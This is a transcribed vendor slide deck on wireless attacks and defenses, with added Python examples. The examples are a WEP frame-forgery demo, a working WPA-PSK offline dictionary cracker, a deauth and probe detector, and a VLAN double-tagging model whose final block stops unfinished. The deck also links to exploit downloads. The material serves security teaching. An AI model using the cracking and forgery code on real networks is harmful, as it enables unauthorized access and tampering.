War of the Airwaves: Wireless Hacks & Defenses
Richard Rushing, Chief Security Officer, AirDefense, Inc.
rrushing@airdefense.net, www.airdefense.net
Get Ready for the Untethered World!
Copyright © 2002-2007 AirDefense Proprietary and Confidential.

Slide 2: Wired Network Security Architecture
[Diagram: a secure enterprise perimeter separates Internet attackers from the intranet (server, desktop). Threats shown: virus & malware, inside threat, data theft.]

Slide 3: Wireless Threats to Enterprise Networks: Everyone is on the Inside
[Diagram: Internet, intranet with server, desktop, laptop, AP and a mobile user; six wireless threats are numbered.]
1. Rogue AP connected to the network
2. Leaked wired traffic & insertion
3. Non-compliant AP
4. Neighboring AP
5. Users bypassing network security controls
6. Wi-Fi phishing: an evil twin hacker posing as a municipal Wi-Fi AP
Municipal Wi-Fi aggravates threats to enterprise networks.

Slide 4: Characteristics of Wireless Networks
1. Air vs. wire: a shared, uncontrolled medium. Invisible, airborne threats are hard to control compared with a wired network.
2. Self-deploying and transient networks: the simplicity of self-discovery creates security challenges.
3. The mobile nature of WLAN devices and users requires in-depth forensics capability to address security breaches.
4. User indifference: invisible connectivity and the truly distributed nature give a faulty sense of security.
Easier to attack: lax WLAN security is the lowest-hanging fruit for hackers, and dozens of tools are readily available to exploit these holes. Wireless networks pose higher risks than wired networks.

Slide 5: Layered Approach to Security
[Diagram: damage plotted against attack sophistication. Wired networks rely on layered wired security tools: secure perimeter, firewalls, SSL VPN, content filtering, anti-virus. For wireless networks the predominant attacks arrive below those layers and increase the vulnerability of the upper layers; AirDefense is placed at that lowest layer.]

Slide 6: Wireless Attack Surface
[Figure: signal emitted from a single access point.]

Slide 7: Just a Little WiGLE
Over 11 million networks, with GPS. I know all your secrets!

Slide 8: Security is Never About "Just Good Enough"
- Run your firewall for 6 minutes a day
- Turn off your IDS
- Allow all traffic through your firewall
- Leave doors unlocked
- Leave keys in the car

Slide 9: Wireless Data Breaches in Retail

Slide 10: Agenda
- Introduction to Wireless Security
- Wireless Risks & Attacks: attacking the RF medium (passive listening, wired network leakage, injection, jamming, breaking WEP)
- Best Practices for Wireless Security
- The AirDefense Solution
- Q&A

Slide 11: Wireless Sniffing: Why & What Happens
- Any clear-text is heard by everyone.
- If you are using WEP, remember everyone has YOUR key.
- Very common at hotspots.
- Hashes are clear-text, and most services still authenticate over clear-text with no tunnels.
- Internal/corporate servers are at higher risk due to lower security.

Slide 12: It's Encrypted. Is It Really Encrypted?
On some APs "Both" (encryption optional) is the typical security setting, and nothing shows whether the data is actually encrypted. From the #1 AP vendor's documentation on enabling WEP, MIC and TKIP ("Set the WEP level and enable TKIP and MIC"):
"If you enter optional, client devices can associate to the access point with or without WEP enabled. You can enable TKIP with WEP set to optional but you cannot enable MIC. If you enter mandatory, client devices must have WEP enabled to associate to the access point. You can enable both TKIP and MIC with WEP set to mandatory." (www.cisco.com)
Slide 13: WEP Summary of Attacks
23 known attacks against WEP. The underlying weaknesses:
- Lack of IV replay protection
- Short IV sequence space
- RC4 vulnerabilities due to WEP's implementation
- Linear properties of CRC32 (allows bit flipping)
- Lack of a keyed message integrity check (MIC)
- Use of shared keys
This shows that implementation is VERY IMPORTANT.
Breaking WEP: 2001 uncrackable; 2003 years; 2004 days; 2005 hours; 2006 minutes; 2007 seconds.
Ultimate hacking tool for WEP: http://www.aircrack-ng.org/

Slide 14: WPA-PSK
The PSK version of WPA suffers from an offline dictionary attack because the information required to create and verify a session key is BROADCAST. In WPA the PMK (master key) is produced by running a special function on a preshared passphrase and the SSID; both the host and the AP use this PMK, along with MAC addresses and nonces, to create the PTK (session key).
  PMK = PBKDF2(passphrase, ssid, ssidLength, 4096, 256)
  PTK = PRF-512(PMK, "Pairwise key expansion", Min(AP_Mac, Client_Mac) || Max(AP_Mac, Client_Mac) || Min(ANonce, SNonce) || Max(ANonce, SNonce))
[Diagram: four-way handshake between client and access point, both already holding the PMK.]
1. AP -> Client: EAPOL-Key (ANonce). The client picks its SNonce and derives the PTK.
2. Client -> AP: EAPOL-Key (SNonce, MIC, RSN IE). The AP derives the PTK.
3. AP -> Client: EAPOL-Key (ANonce, MIC, RSN IE). The client installs keys.
4. Client -> AP: EAPOL-Key (SNonce, MIC). The AP installs keys.
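The CRC32 bit-flipping weakness from the slide 13 list, as an added worked example that is not part of the original deck: RC4 is a stream cipher and the ICV is an unkeyed CRC32, so an attacker who knows or guesses the plaintext at some offsets can XOR changes into the ciphertext and repair the encrypted ICV with a correction that depends only on the change, never on the key. The key, IV and frame contents are constructed for the demonstration, and the frame body is simplified to IV || RC4(payload || ICV) with no key-index byte.

```python
"""WEP ICV bit-flipping (slide 13): the integrity check is an unkeyed CRC32
XORed with the RC4 keystream, so an attacker can change known plaintext bytes
and repair the ICV without ever learning the WEP key.  Key, IV and frame
contents below are constructed for the demonstration."""
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). WEP seeds it with IV || shared key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def crc32(data: bytes) -> int:
    return zlib.crc32(data) & 0xFFFFFFFF


def wep_encrypt(wep_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV || RC4(IV || key, plaintext || ICV), ICV = CRC32 (little-endian)."""
    icv = struct.pack("<I", crc32(plaintext))
    return iv + rc4(iv + wep_key, plaintext + icv)


def wep_decrypt(wep_key: bytes, frame: bytes):
    """Receiver side: return the plaintext if the ICV verifies, else None."""
    iv, body = frame[:3], frame[3:]
    clear = rc4(iv + wep_key, body)
    plaintext, icv = clear[:-4], clear[-4:]
    if struct.pack("<I", crc32(plaintext)) != icv:
        return None
    return plaintext


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """Attacker side, no key needed.  XORing the ciphertext with delta XORs the
    plaintext with delta (stream cipher).  CRC32 is affine over GF(2):
        crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros(len(p)))
    so the ICV correction depends only on delta and the payload length."""
    iv, body = frame[:3], frame[3:]
    n = len(body) - 4
    if len(delta) != n:
        raise ValueError("delta must cover the whole payload (pad with zero bytes)")
    icv_fix = crc32(delta) ^ crc32(bytes(n))
    mask = delta + struct.pack("<I", icv_fix)
    return iv + bytes(b ^ m for b, m in zip(body, mask))


# Constructed demo values: 40-bit key, 24-bit IV, a short clear-text request.
WEP_KEY = bytes.fromhex("0badc0ffee")
IV = bytes.fromhex("010203")
ORIGINAL = b"GET /balance?acct=1001 HTTP/1.0"
TARGET = b"GET /balance?acct=9001 HTTP/1.0"  # attacker only needs to know the bytes it changes


def demo_bitflip():
    """Encrypt ORIGINAL, tamper without the key, decrypt as the AP would."""
    frame = wep_encrypt(WEP_KEY, IV, ORIGINAL)
    delta = bytes(a ^ b for a, b in zip(ORIGINAL, TARGET))
    forged = flip_bits(frame, delta)
    return wep_decrypt(WEP_KEY, forged)


if __name__ == "__main__":
    print(demo_bitflip())
```

The receiver accepts the forged frame with a valid ICV, which is why the missing keyed MIC is listed as a separate weakness on the slide: only a MIC keyed with session material (TKIP's Michael, CCMP's CBC-MAC) stops this, and a stronger unkeyed checksum would not.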
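The handshake on slide 14 and the cracking tools on slide 15, as an added example that is not from the deck or from any of the tools named: the PBKDF2, PRF-512 and MIC computation, a coWPAtty-style wordlist loop that checks each candidate against the captured EAPOL message 2, and the per-SSID PMK precomputation that the "rainbow-like" tables rely on. The SSID, MAC addresses, nonces, passphrase and wordlist are constructed, and the EAPOL-Key message 2 is built here with a known passphrase so that the attack has a real MIC to verify against.

```python
"""WPA-PSK offline dictionary attack (slides 14 and 15): everything except
the passphrase (SSID, both MACs, both nonces, the MIC'd EAPOL message 2)
is sent in the clear, so each candidate passphrase can be checked offline.
The handshake below is constructed with a known passphrase, not captured."""
import hashlib
import hmac
import struct

MIC_OFFSET = 81  # EAPOL header (4) + key-descriptor fields before the MIC (77)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce) -> bytes:
    """PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    out = b""
    for i in range(4):  # 4 x 160 bits covers 512 bits
        out += hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]),
                        hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck: bytes, eapol: bytes, tkip: bool = True) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed; KCK = PTK[0:16].
    WPA/TKIP uses HMAC-MD5, WPA2/CCMP uses HMAC-SHA1 truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    if tkip:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, kck: bytes) -> bytes:
    """Constructed minimal EAPOL-Key message 2 (WPA descriptor 254, key info:
    pairwise + MIC + HMAC-MD5/RC4 version, replay counter 1), MIC filled in."""
    key_desc = (struct.pack(">BHH", 254, 0x010A, 32) + struct.pack(">Q", 1)
                + snonce + bytes(16) + bytes(8) + bytes(8) + bytes(16)
                + struct.pack(">H", 0))
    eapol = struct.pack(">BBH", 1, 3, len(key_desc)) + key_desc
    mic = eapol_mic(kck, eapol)
    return eapol[:MIC_OFFSET] + mic + eapol[MIC_OFFSET + 16:]


def crack_psk(ssid, ap_mac, client_mac, anonce, snonce, msg2, wordlist, tkip=True):
    """coWPAtty-style loop: one PBKDF2 per candidate, then compare the MIC."""
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid),
                           ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2, tkip), captured_mic):
            return candidate
    return None


def pmk_table(ssid, wordlist):
    """The slide-15 'rainbow-like' tables: PBKDF2 is the expensive step and
    depends only on (passphrase, SSID), so it is precomputed per SSID."""
    return {w: pmk_from_passphrase(w, ssid) for w in wordlist}


# Constructed capture: a small network whose passphrase is in the wordlist.
SSID = "corp-guest"
AP_MAC = bytes.fromhex("00022d50d14e")
CLIENT_MAC = bytes.fromhex("00122d50431e")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
WORDLIST = ["password", "letmein", "dragonfly07", "corp2007"]


def constructed_capture():
    """What a sniffer sees: SSID, MACs, nonces and the MIC'd message 2."""
    kck = ptk_from_pmk(pmk_from_passphrase("dragonfly07", SSID),
                       AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    return SSID, AP_MAC, CLIENT_MAC, ANONCE, SNONCE, build_msg2(SNONCE, kck)


def demo_crack():
    return crack_psk(*constructed_capture(), WORDLIST)


if __name__ == "__main__":
    print(demo_crack())
```

The cost per candidate is one PBKDF2 run (4096 HMAC-SHA1 iterations) and is the same whatever the passphrase length, which answers the 21-character question on slide 15: length only helps if it keeps the passphrase out of every wordlist. The PMK also depends on the SSID, so a precomputed table is only useful against the SSIDs it was built for. Pass tkip=False for a WPA2/CCMP handshake.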
Slide 15: WPA Tools (Easier than WEP)
- ptcrack (http://sourceforge.net/projects/ptcrack/): a hybrid dictionary/brute-force passphrase search tool for PMK discovery on 802.11 networks using WPA with preshared keys (PSKs).
- coWPAtty 3.0 (http://www.churchofwifi.org): designed to audit the security of pre-shared keys selected in Wi-Fi Protected Access (WPA) networks.
- Rainbow-like tables (http://umbra.shmoo.com:6969/torrents/wpa_psk-h1kari_renderman.torrent): the resulting list is ~1,000,000 words, for a total of approximately 40 GB of hash tables for the top 1000 SSIDs.
- Aircrack-ng (http://www.aircrack-ng.org/): built-in WPA cracker since version 2.3.
- WPA Cracker (http://www.tinypeap.com/page8.html): a brute-force password cracker; all information is entered manually.
- Rogue Squadron WRT firmware (http://airsnarf.shmoo.com/rogue_squadron/index.html)
Cracking rates quoted: 80 keys per second (2006), 130 keys per second (2007), 30,000 keys per second (2007).
If you use a 21-character passphrase, are you safe? How many clients and APs let you enter 31 characters? What happens when you reach that limit and overlap with the SSID?

Slide 16: What in the Air can Kill You? The #1 Corporate Vulnerability
- Even if the data is encrypted, the services in use can be identified from the MAC addresses, which are not encrypted.
- Remember wireless is LAYER 2; it will send out all Layer 2 traffic: VRRP, HSRP, Spanning Tree, OSPF, VTP/VLAN, CDP.
- VLANs don't help unless the traffic is filtered.
- MOST of these protocols USE HASHES or PASSWORDS sent in clear text.
- Broadcast/multicast key rotation is OFF by default, and client devices using static WEP cannot use the access point when you enable broadcast key rotation.
- It's a two-way street: what goes out can also come in!

Slide 17: Injection of Traffic
Yersinia is a network tool designed to take advantage of some weaknesses in different network protocols. It pretends to be a solid framework for analyzing and testing the deployed networks and systems (http://www.yersinia.net).
Attacks: Spanning Tree Protocol (STP), Cisco Discovery Protocol (CDP), Dynamic Trunking Protocol (DTP), Dynamic Host Configuration Protocol (DHCP), Hot Standby Router Protocol (HSRP), 802.1Q, 802.1X, Inter-Switch Link Protocol (ISL), VLAN Trunking Protocol (VTP).
Current exploits:
- Cisco CatOS VLAN Trunking Protocol Remote Command Execution Vulnerability
- Cisco IOS Multiple VLAN Trunking Protocol Code Execution and DoS Vulnerabilities
- Cisco Intrusion Prevention and Detection Systems DoS and Security
- Cisco Access Point Web-browser Interface Unauthorized Administrative Access and Bypass Issue

Slide 18: Agenda
- Introduction to Wireless Security
- Wireless Risks & Attacks: attacking clients (wireless fuzzing, mobile workers, Windows Zero Configuration, hotspots, station impersonation, bridging interfaces, wireless printers)
- Best Practices for Wireless Security
- The AirDefense Solution
- Q&A

Slide 19: Clients
- All shapes and sizes: hotspots, Wi-Fi phones, free access via OUI.
- Many ways to attack clients: scan, exploit, repeat. But why do you have to? Have the client come to you!
- YOU KNOW WHAT THEY WANT: the client's probe request names the network it is looking for, so bring up a soft AP that answers that probe request.

Slide 20: Attacking Wireless Clients: Packets of Death
- Plenty of them, from handheld devices to laptops.
- Most are BAD packets: usually management or control frames, some are data. WEP cracking is adding to the packets.
- Fuzzing: most use cut-through data rates (5.5 Mbps for beacon frames); most are simple buffer overflows; lots of things go BOOM: client software, authentication supplicants.
- Injection library: http://www.802.11mercenary.net/lorcon/

Slide 21: Client MAC Address Spoofing
[Diagram: the hacker station takes over the MAC of the legitimate user station and associates to the AP.]
1. Find a MAC address: the user station's MAC is 00 02 2D 50 D1 4E (Cisco 350); the hacker's own card has 00 12 2D 50 43 1E (Orinoco Gold).
2. Change the MAC (SMAC, regedit) so the hacker's card now reports 00 02 2D 50 D1 4E.
3. Re-initialize the card.
4. Associate to the AP.
SMAC (www.klcconsulting.net/smac) is a MAC address modifying utility (spoofer) for Windows 2000/XP and Server 2003 systems, regardless of whether the manufacturer allows this option or not. MAC filtering is not enough.

Slide 22: How Not to Attack a Client ("Wired Thinking" Attack)
[Diagram: intruder laptop running a soft AP, user station, corporate network.]
1. The laptop sends a probe request.
2. The intruder's AP responds to the probe request.
3. The naive user associates with the AP.
4. The AP provides an IP address to the user.
5. Scan the laptop for Windows vulnerabilities and compromise it.
6. Use the user station as a launch pad into the corporate network.
Municipal Wi-Fi increases the evil twin attack surface.

Slide 23: Windows Wireless Zero Configuration
1. Wireless Auto Configuration attempts to connect to the preferred networks that appear in the list of available networks, in preferred-network order.
2. If there are no successful connections, Wireless Auto Configuration attempts to connect to the preferred networks that are hidden wireless networks (no SSID in the beacon).

Slide 24: Windows Wireless Zero Configuration (continued)
3. If there are no successful connections and there is an ad hoc network in the list of preferred networks that is available, Wireless Auto Configuration tries to connect to it.
Slide 25: Windows Wireless Zero Configuration (continued)
4. If there are no successful connections, Wireless Auto Configuration configures the wireless network adapter to act as the first node in the ad hoc network.
5. If there are no successful connections to preferred networks, there are no ad hoc networks in the list of preferred networks, and "Automatically connect to non-preferred networks" is enabled, Wireless Auto Configuration attempts the non-preferred networks.
6. If all connection attempts to non-preferred networks fail, Wireless Auto Configuration creates a random wireless network name and places the wireless network adapter in infrastructure mode.
7. If the Windows wireless client is already connected to a wireless network but a more preferred wireless network becomes available, Wireless Auto Configuration disconnects from the current wireless network and attempts to connect to the more preferred one.

Slide 26: Wireless Phishing
- Tools such as Karma can respond to ANY client probe request and offer a variety of services (POP, FTP and HTTP) to lure unsuspecting users.
- There is no authentication of the "pervasive wireless cloud".
- Automatic network selection in Windows (the Zero Configuration client) and on Macs is dangerous.
- Enterprises need to manage centralized policies.
- Karma (http://theta44.org/karma/index.html), AirSnarf (http://airsnarf.shmoo.com/)
Slide 27: DHCP and DNS Client Attacks
Since they took the hook and are now asking for more, feed the hungry fish.
- "Give me an IP address": give them an address that could be excluded from personal firewalls (10.x.x.x, 192.168.x.x, 172.16.x.x), or the IP address they are looking for.
- DHCP attack: the exploit attacks a client and creates an admin user on the device. DHCP broadcast attack (MS06-036): http://www.milw0rm.com/sploits/07212006-MS06_036_DHCP_Client.tar.gz
- DNS attack/manipulation: "I am DNS, I am the Internet" (Cricket Liu). The attacker can offer you anything and you believe it: banking, hotel, airline and work sites (Exchange, Oracle, SQL).

Slide 28: Data Seepage
- Your notebook is not location-aware: office, home or hotspot, all data is the same.
- Interfaces are active in order, and the last interface is usually Wi-Fi; it always wants to connect to something, and all it takes is someone to offer a connection.
- What am I connected to? Company name, servers, e-mail, clients, applications and more leak wherever you are.

Slide 29: Agenda
- Introduction to Wireless Security
- Wireless Risks & Attacks: real-world wireless issues (zero-day attacks, hotspots)
- Best Practices for Wireless Security
- The AirDefense Solution
- Q&A

Slide 30: Exploiting is too Easy!
vx.netlux.org: MVBSWE worm editors, virus editors, script editors. Do you trust your hotspot web page? Corporate guest access?

Slide 31: Zero Day Alerts
http://www.frsirt.com/, http://www.cert.org, http://nvd.nist.gov
"FrSIRT delivers vulnerability and threat alerts, 24/7, 365 days a year, to inform organizations of new potential threats. Our services are designed to deliver notification of vulnerabilities and exploits as they are identified, providing timely, actionable information and guidance to help mitigate risks before they are exploited."

Slide 32: Zero Day
- New attacks: zero-day attacks against known services; zero-day attacks against IE and Firefox.
- Remote exploits: I am on your system as YOU!
- New Trojans and viruses ready for injection.
- Favorite exploits: the NEW WMF exploit, Media Player, Java exploits (www.milw0rm.com).

Slide 33: Adding to the Metasploit Framework
- Wireless-enabled, driver-level exploits
- Point-and-click exploits
- Exploits for zero-day attacks
- Numerous payloads: a number of ways to take over your computer

Slide 34: Agenda
- Introduction to Wireless Security
- Wireless Risks & Attacks: enumeration of wireless devices, password sniffing & cracking, hacking password hashes, breaking VPNs over wireless, listening to VoIP conversations, one-way insertion attacks, zero-day attacks, snarfing
- Best Practices for Wireless Security
- The AirDefense Solution
- Q&A

Slide 35: Hacking Password Hashes
- Get virtually any password, offline and passively: LEAP, PPTP, MS-CHAPv2, MD5.
- Search a hash list to find the password: a large password list is used to generate the hashes, requiring 3-5 GB of space.
- Rainbow tables are indexed hash lists, requiring 2-3 TB of space; known tables exist for up to 14 characters.
- http://rainbowtables.shmoo.com/, http://www.antsight.com/zsl/rainbowcrack/, http://www.rainbowcrack-online.com/
Slide 36: Man-in-the-Middle Attack: WLAN Jack & Air-Jack Tools
[Diagram: AP and server on one side, the target station on the other, a dual-card attacker in between.]
Allows the attacker to intercept ALL communications between the client and the AP, and to pretend to be the client without disrupting the client's session at Layer 2. Possible because management frames are not authenticated and the AP itself is not authenticated.
Step 1: Disassociate the target station from the AP by spoofing the MAC of the AP and sending Disassociate and Deauthenticate frames.
Step 2: The attacker re-associates the target to the malicious station and itself connects to the AP.

Slide 37: Snarfing Hot Spots
Security question: connecting to an untrusted network and launching the most vulnerable program you have just screams "EXPLOIT ME"!
- Fake web pages steal your hotspot password.
- Evil web pages infect your PC with malware.
- My web pages steal your NT password (1x1 pixel), use cross-site scripting, install Trojans and spyware, open back doors, change the registry, add a user account, share files and such.
Oops, you just opened a web page, that's all!

Slide 38: Next Generation Wireless Attacks
- 802.1X state machine: client-initiated disconnection assumes everyone plays nice.
- Fuzzing attacks will expand: Intel driver issues, 802.1X supplicant issues, AP issues.
- Exploit more EAP types.
- Windows Vista: the wireless stack is rewritten. Good news: support for many EAP types, provided for XP too. Bad news: hacking tools ported to Windows, built-in network address spoofing, point-and-click "hacking".
- TLS is not secure in Windows.
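The deauthentication step of the slide 36 attack and the probe-request harvesting that Karma (slide 26) relies on, as an added monitoring example that is not AirDefense code or any tool's: a minimal 802.11 management-frame builder and parser, a constructed capture, and two WIDS-style checks. Because management frames carry no authentication, the only handles a monitor has are behaviour (how many deauths hit one victim) and consistency (a forged frame carries the AP's MAC but the attacker's own sequence counter). Frame contents, MACs, SSIDs and thresholds are constructed and illustrative.

```python
"""Management-frame monitoring for slides 26 and 36.  802.11 management
frames are neither authenticated nor encrypted, so (a) a Karma-style soft AP
can read every SSID a client probes for and answer it, and (b) an attacker
can send deauth/disassoc frames with the AP's MAC as sender.  Parser,
capture and thresholds are constructed for illustration."""
import collections
import struct

# Management subtypes (frame type 0)
PROBE_REQ, BEACON, DISASSOC, DEAUTH = 4, 8, 10, 12
BROADCAST = b"\xff" * 6


def mgmt_frame(subtype: int, da: bytes, sa: bytes, bssid: bytes, seq: int, body: bytes) -> bytes:
    """Build a management frame: FC, duration, addr1=DA, addr2=SA, addr3=BSSID, seq ctrl, body."""
    frame_control = struct.pack("<H", subtype << 4)  # type 0 (management), version 0
    return frame_control + b"\x00\x00" + da + sa + bssid + struct.pack("<H", seq << 4) + body


def parse_mgmt(frame: bytes):
    """Return the header fields of a management frame, or None for other frame types."""
    if len(frame) < 24:
        return None
    fc = frame[0]
    if (fc >> 2) & 0x3 != 0:
        return None
    return {
        "subtype": fc >> 4,
        "da": frame[4:10], "sa": frame[10:16], "bssid": frame[16:22],
        "seq": struct.unpack("<H", frame[22:24])[0] >> 4,
        "body": frame[24:],
    }


def parse_ies(body: bytes):
    """Information elements are (tag, length, value) triples; tag 0 is the SSID."""
    ies, i = [], 0
    while i + 2 <= len(body):
        tag, length = body[i], body[i + 1]
        ies.append((tag, body[i + 2:i + 2 + length]))
        i += 2 + length
    return ies


def analyse(frames, deauth_threshold=5, seq_window=64):
    """Return (alerts, probed_ssids).  alerts is a list of (kind, detail) tuples."""
    alerts = []
    deauths = collections.Counter()          # (bssid, victim) -> count
    last_seq = {}                            # transmitter -> last sequence number
    probed = collections.defaultdict(set)    # client -> SSIDs it asked for
    for frame in frames:
        f = parse_mgmt(frame)
        if f is None:
            continue
        # A forged frame carries the spoofed MAC but the attacker's own
        # sequence counter, so it jumps far away from the real AP's counter.
        prev = last_seq.get(f["sa"])
        if prev is not None and (f["seq"] - prev) % 4096 > seq_window:
            alerts.append(("seq_anomaly", (f["sa"].hex(":"), prev, f["seq"])))
        last_seq[f["sa"]] = f["seq"]
        if f["subtype"] in (DEAUTH, DISASSOC):
            key = (f["bssid"], f["da"])
            deauths[key] += 1
            if deauths[key] == deauth_threshold:
                alerts.append(("deauth_flood", (key[0].hex(":"), key[1].hex(":"))))
        elif f["subtype"] == PROBE_REQ:
            for tag, value in parse_ies(f["body"]):
                if tag == 0 and value:  # a non-empty SSID: a preferred network leaking
                    probed[f["sa"]].add(value.decode("utf-8", "replace"))
    return alerts, dict(probed)


# Constructed capture: real AP beacons, an attacker's deauths spoofing the AP
# (with its own counter starting at 0), and a client probing its preferred list.
AP = bytes.fromhex("00022d50d14e")
CLIENT = bytes.fromhex("00122d50431e")


def constructed_capture():
    frames = [mgmt_frame(BEACON, BROADCAST, AP, AP, 1200 + i, b"") for i in range(5)]
    reason = struct.pack("<H", 7)  # class 3 frame received from a non-associated station
    frames += [mgmt_frame(DEAUTH, CLIENT, AP, AP, i, reason) for i in range(8)]
    frames += [mgmt_frame(BEACON, BROADCAST, AP, AP, 1205 + i, b"") for i in range(5)]
    for n, ssid in enumerate([b"corp-wifi", b"linksys", b"tmobile"]):
        ies = bytes([0, len(ssid)]) + ssid + bytes([1, 1, 0x82])  # SSID IE + one rate IE
        frames.append(mgmt_frame(PROBE_REQ, BROADCAST, CLIENT, BROADCAST, 40 + n, ies))
    return frames


if __name__ == "__main__":
    for item in analyse(constructed_capture()):
        print(item)
```

A real sensor counts per time window and per channel rather than over a whole capture, and the sequence-number check must tolerate retransmissions and the 12-bit wrap, but the two signals are the same ones a WIDS uses because a deauth frame offers nothing else to verify. The probed SSID set is exactly what Karma answers with.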
Slide 39: Firewall Myths
The "firewall only" approach to network security. Firewalls:
- Cannot stop rogue wireless devices
- Do not eliminate the need for wireless scanning for rogues
- Do not protect against wireless attacks
Once a hacker is on the network they can punch through open ports. Access control lists are weaker than firewalls. The best bet is to keep hackers off the network.

Slide 40: VPN Myths
A VPN still allows the hacker to get onto the open Wi-Fi network and exploit the network or clients for weaknesses.
- The VPN client cannot run on many embedded devices (e.g., wireless scanners, VoWi-Fi handsets).
- Subnet roaming is problematic.
- Less performance and more overhead.
- Attackers can break weak encryption & authentication: re-authentication on weak ciphers, dictionary attacks on weak ciphers.
- Protocol & server flaws are exposed: IKE aggressive mode with pre-shared keys, exploiting bugs in the VPN server.
For wireless security a VPN is a Layer 3 solution to a Layer 2 problem.

Slide 41: VLANs (Virtual Local Area Networks)
A logical grouping of devices or users: users can be grouped by function, department or application regardless of physical segment location. VLAN configuration is done at the switch (Layer 2). WIRELESS is not the SAME (spoofing is EASY).
VLAN membership:
- Static VLAN assignment (port based): membership is determined by the port on the switch, not by the host.
- Dynamic VLAN assignment: membership is determined by the host's MAC address; the administrator has to create a database of MAC addresses and VLAN mappings.

Slide 42: Guest Networking Issues on VLANs
[Diagram: WLAN SSID "Guest", DHCP server and DNS server inside the corporate network, Internet. Legend: 802.1Q VLAN used to "tunnel" guest traffic; DHCP address supplied containing DNS server information; DNS request from the client.]
Guest access to the Internet via the WLAN: the WLAN client gets its IP address via DHCP from a server that sits inside the corporate network, including the DNS server details. Sometimes there is a split, but that does not help either, as the DNS server is still in the corporate LAN.
Issues: DHCP DoS, access point DNS DoS, VLAN hopping, among others.

Slide 43: VLAN Hopping
[Diagram: SSIDs Corp, Guest, OLD and VOIP on one AP, each mapped to a VLAN; a client on "Guest" (WPA2) or "Guest" (WEP only) with a "?" for which VLAN it really reaches.]
- Basic VLAN hopping attack: the attacker fools the switch into thinking that he is a switch that needs trunking.
- Double-encapsulated VLAN hopping attack: switches perform only one level of IEEE 802.1Q decapsulation. This allows the attacker to specify a .1Q tag inside the frame, so the frame goes to a VLAN that the outer tag did not specify.

Slide 44: Why VLANs do not Work for Wireless
- VLANs make a logical network on a physical medium, not on a virtual medium.
- They are designed around port usage, and there are no physical ports on wireless.

Slide 45: Agenda
- Introduction to Wireless Security
- Wireless Risks & Attacks
- Best Practices for Wireless Security
- The AirDefense Solution
- Q&A

Slide 46: Recommended Wireless Security Strategy
- Automatically keep all unauthorized wireless devices off the entire wired network, all the time.
- Accurately detect (WIDS) and automatically defend (WIPS) against the greatest number of wireless attacks possible.
- Contain and control authorized wireless devices, both inside owned facilities and outside at hotspots, municipal Wi-Fi zones and home.
- Continually assure strong security configurations and policies 24x7 on all authorized wireless devices.
- Store and data-mine long-term, forensics-quality information for investigations and for diagnosing wireless problems.
- Measure and prove compliance with regulatory wireless security policies and controls.
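The double-encapsulated attack on the VLAN hopping slide, as an added model that is not from the deck: a frame builder with 802.1Q push/pop, and a model of one switch popping a single tag at ingress, the trunk carrying native-VLAN frames untagged, and the next switch classifying what arrives. The assumed configuration is the one the guest-networking slide describes, a guest SSID mapped to a VLAN that is also the trunk's native VLAN; MACs, VLAN IDs and payload are constructed. It is a model of tag handling only, not a packet injector.

```python
"""Double-encapsulated 802.1Q VLAN hopping (VLAN hopping slide): a switch
strips only one tag, so a frame tagged with the trunk's native VLAN outside
and the target VLAN inside ends up in the target VLAN after the trunk.
MACs, VLAN IDs and payload are constructed."""
import struct

TPID_8021Q = 0x8100
ETHERTYPE_IPV4 = 0x0800


def ethernet(dst: bytes, src: bytes, ethertype: int, payload: bytes) -> bytes:
    return dst + src + struct.pack("!H", ethertype) + payload


def push_tag(frame: bytes, vid: int, pcp: int = 0) -> bytes:
    """Insert a 4-byte 802.1Q tag (TPID + TCI) between source MAC and EtherType."""
    tci = (pcp << 13) | (vid & 0x0FFF)
    return frame[:12] + struct.pack("!HH", TPID_8021Q, tci) + frame[12:]


def pop_tag(frame: bytes):
    """Remove the OUTERMOST tag only, as a switch does.  Returns (vid, frame);
    vid is None when the frame is untagged."""
    if struct.unpack("!H", frame[12:14])[0] != TPID_8021Q:
        return None, frame
    vid = struct.unpack("!H", frame[14:16])[0] & 0x0FFF
    return vid, frame[:12] + frame[16:]


def cross_trunk(frame: bytes, native_vlan: int, tag_native: bool = False):
    """Model: frame enters switch 1 on a native-VLAN port, crosses an 802.1Q
    trunk, and is classified by switch 2.  tag_native=False is the usual
    default (native VLAN is sent untagged on the trunk)."""
    vid, inner = pop_tag(frame)
    if vid is None:
        vid = native_vlan
    elif vid != native_vlan:
        return ("dropped", vid)             # tag for a foreign VLAN on an access port
    on_wire = push_tag(inner, native_vlan) if tag_native else inner
    vid2, _delivered = pop_tag(on_wire)     # switch 2 performs one decapsulation
    return ("delivered", native_vlan if vid2 is None else vid2)


ATTACKER = bytes.fromhex("00122d50431e")
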